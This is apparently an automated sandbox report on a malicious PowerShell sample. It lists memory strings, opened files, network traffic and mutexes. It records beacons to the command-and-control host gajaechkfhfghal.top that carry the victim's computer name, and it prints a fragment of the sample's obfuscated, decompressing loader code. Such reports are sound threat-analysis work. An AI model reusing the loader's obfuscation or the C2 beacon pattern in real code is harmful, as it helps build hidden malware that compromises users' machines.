Source: | Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.19711562814.0000012D47476000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: 6?lib.pdbpdblib.pdbR source: powershell.exe, 00000000.00000002.19711562814.0000012D473FF000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbQ source: powershell.exe, 00000000.00000002.19714097677.0000012D47632000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.19713429136.0000012D474F2000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: scorlib.pdb% source: powershell.exe, 00000000.00000002.19711562814.0000012D473FF000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: mscorlib.pdb source: powershell.exe, 00000000.00000002.19713678701.0000012D475E0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.19711562814.0000012D4747A000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.19714097677.0000012D47627000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: 364e35\System.Management.Automation.pdb, source: powershell.exe, 00000000.00000002.19711562814.0000012D473FF000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: System.Management.Automation.pdb-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 source: powershell.exe, 00000000.00000002.19713678701.0000012D475E0000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: ion.pdb@ source: powershell.exe, 00000000.00000002.19711562814.0000012D473FF000.00000004.00000020.00020000.00000000.sdmp |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | HTTP traffic: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: www.google.com Connection: Keep-Alive |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | HTTP traffic: GET /sorry/index?continue=http://www.google.com/&q=EgS_YOPMGLmspbsGIjABsAknkK1fPQw7soCldGAb8V4-f3S2hKBFyuD5NMh92dMWpKKNr9WYzRGbiwpSeC0yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: www.google.com Cookie: NID=520=d35BnNjBn9lHyRyhcXI14E66uAwGvq18XUwHjerGxFuNTfLtsWmjtFbfRwypj2bSbZ9RlpMTupjEwY5UwFGMceytw9HGj6d2WYCAPsog_yQagaD2LroYRzyJYubdZH1CPtVLRAZ7gcTyIqllglQdRtJTHBox9xMpU5ylIFEutZV7Kgj9Ek5kGQiq22D2eMqdPddc2w |
Source: global traffic | HTTP traffic detected: GET /hxe035pvfthtr.php?id=computer&key=72113948934&s=527 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: gajaechkfhfghal.top Connection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: www.google.com Connection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /sorry/index?continue=http://www.google.com/&q=EgS_YOPMGLmspbsGIjABsAknkK1fPQw7soCldGAb8V4-f3S2hKBFyuD5NMh92dMWpKKNr9WYzRGbiwpSeC0yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: www.google.com Cookie: NID=520=d35BnNjBn9lHyRyhcXI14E66uAwGvq18XUwHjerGxFuNTfLtsWmjtFbfRwypj2bSbZ9RlpMTupjEwY5UwFGMceytw9HGj6d2WYCAPsog_yQagaD2LroYRzyJYubdZH1CPtVLRAZ7gcTyIqllglQdRtJTHBox9xMpU5ylIFEutZV7Kgj9Ek5kGQiq22D2eMqdPddc2w |
Source: powershell.exe, 00000000.00000002.19683260823.0000012D2FF8C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://$ckda40xjnqlemz6/$jqly5pcaxf6vo3g.php? |
Source: powershell.exe, 00000000.00000002.19683260823.0000012D305E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.19683260823.0000012D303D4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://$ckda40xjnqlemz6/$jqly5pcaxf6vo3g.php?id=$env:computername&key=$dhvyekza&s=527 |
Source: powershell.exe, 00000000.00000002.19710229213.0000012D47075000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06 |
Source: powershell.exe, 00000000.00000002.19710229213.0000012D47075000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0 |
Source: powershell.exe, 00000000.00000002.19711229210.0000012D471D0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micr |
Source: powershell.exe, 00000000.00000002.19683260823.0000012D303D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.19683260823.0000012D2F96C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.19683260823.0000012D30450000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://gajaechkfhfghal.top |
Source: powershell.exe, 00000000.00000002.19683260823.0000012D303D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.19683260823.0000012D2F96C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://gajaechkfhfghal.top/hxe035pvfthtr.php?id=computer&key=72113948934&s=527 |
Source: powershell.exe, 00000000.00000002.19683260823.0000012D303D4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://gajaechkfhfghal.top/hxe035pvfthtr.php?id=computer&key=72113948934&s=527p |
Source: powershell.exe, 00000000.00000002.19705043649.0000012D3F0B4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000000.00000002.19683260823.0000012D2F47F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000000.00000002.19683260823.0000012D2F47F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.pngXz |
Source: powershell.exe, 00000000.00000002.19683260823.0000012D2F47F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/ |
Source: powershell.exe, 00000000.00000002.19683260823.0000012D2F041000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000000.00000002.19683260823.0000012D2F47F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/ |
Source: powershell.exe, 00000000.00000002.19683260823.0000012D2F47F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000000.00000002.19683260823.0000012D2F47F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXz |
Source: powershell.exe, 00000000.00000002.19683260823.0000012D3045C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.19683260823.0000012D2FF7B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.19683260823.0000012D3046F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.19683260823.0000012D30450000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com |
Source: powershell.exe, 00000000.00000002.19683260823.0000012D30450000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com/ |
Source: powershell.exe, 00000000.00000002.19683260823.0000012D3046F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com/&q=EgS_YOPMGLmspbsGIjABsAknkK1fPQw7soCldGAb8V4-f3S2hKBFyuD5NMh92dMWpKKNr9WYzRG |
Source: powershell.exe, 00000000.00000002.19683260823.0000012D3045C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.19683260823.0000012D2FF7B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgS_YOPMGLmspbsGIjABsAknkK1fPQw7 |
Source: powershell.exe, 00000000.00000002.19710229213.0000012D47075000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.quovadis.bm0 |
Source: powershell.exe, 00000000.00000002.19683260823.0000012D2F041000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 00000000.00000002.19705043649.0000012D3F0B4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000000.00000002.19705043649.0000012D3F0B4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000000.00000002.19705043649.0000012D3F0B4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000000.00000002.19683260823.0000012D3045C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://csp.withgoogle.com/csp/gws/other-hp |
Source: powershell.exe, 00000000.00000002.19683260823.0000012D2F47F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000000.00000002.19683260823.0000012D2F47F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/PesterXz |
Source: powershell.exe, 00000000.00000002.19683260823.0000012D308E1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000000.00000002.19705043649.0000012D3F0B4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 00000000.00000002.19710229213.0000012D47075000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ocsp.quovadisoffshore.com0 |
Source: powershell.exe, 00000000.00000002.19683260823.0000012D3047C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.19683260823.0000012D30482000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.19683260823.0000012D2FF8C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.19683260823.0000012D30450000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/recaptcha/api.js |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7548:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7548:304:WilStaging_02 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress)) $pxso79gauievdqb.(([system.String]::new(@((166361/2483),(384171/(1130+2331)),(-5258+5370),(-7731+(10041-2189)),(7604-(19597120/2606)),(8753-8642)))))( $c3f8zdw7rg5ahto ) $pxso79gauievdqb.(([system.String]::new(@((9352-(37177140/4004)),(456192/4224),(-6769+(80+6800)),(-208+(-6187+(597+(14068-8155)))),(-6569+6670)))))()$nhvut5xwzaj3rgy.(([system.String]::new(@((237917/3551),(1085616/10052),(4015-(5446-(9650-8108))),(-8412+8527),(617918/(3034528/496))))))()[byte[]] $tos490z6qg18jkv = $c3f8zdw7rg5ahto.((-join (@((491400/(15110-(25233500/2725))),(996558/8978),(15925/(9664-(19354-9935))),(311448/(11471-(11931-3192))),(6658-6544),(49761/513),(-3536+(21905430/5990)))| ForEach-Object { [char]$_ })))() $q9lpzry8nioak2v=$tos490z6qg18jkv return $q9lpzry8nioak2v}[System.Text.Encoding]::ascii.((-join (@((2523-2452),(-4317+(-1948+(-780+7146))),(-7269+(14457-(12786-(44946324/7866)))),(989-(-3172+4078)),(-7895+(10112-(7645-5544))),(9469-(95570680/(52602184/(17939116/(17200508/(9048-4111)))))),(-2810+2915),(-3634+(24452064/(1012+(5828064/(2011-(10680-9725)))))),(462882/(14147-(19277-9624))))| ForEach-Object { [char]$_ })))((o1kytfw9q8rhup2gsci3j65vdmx " |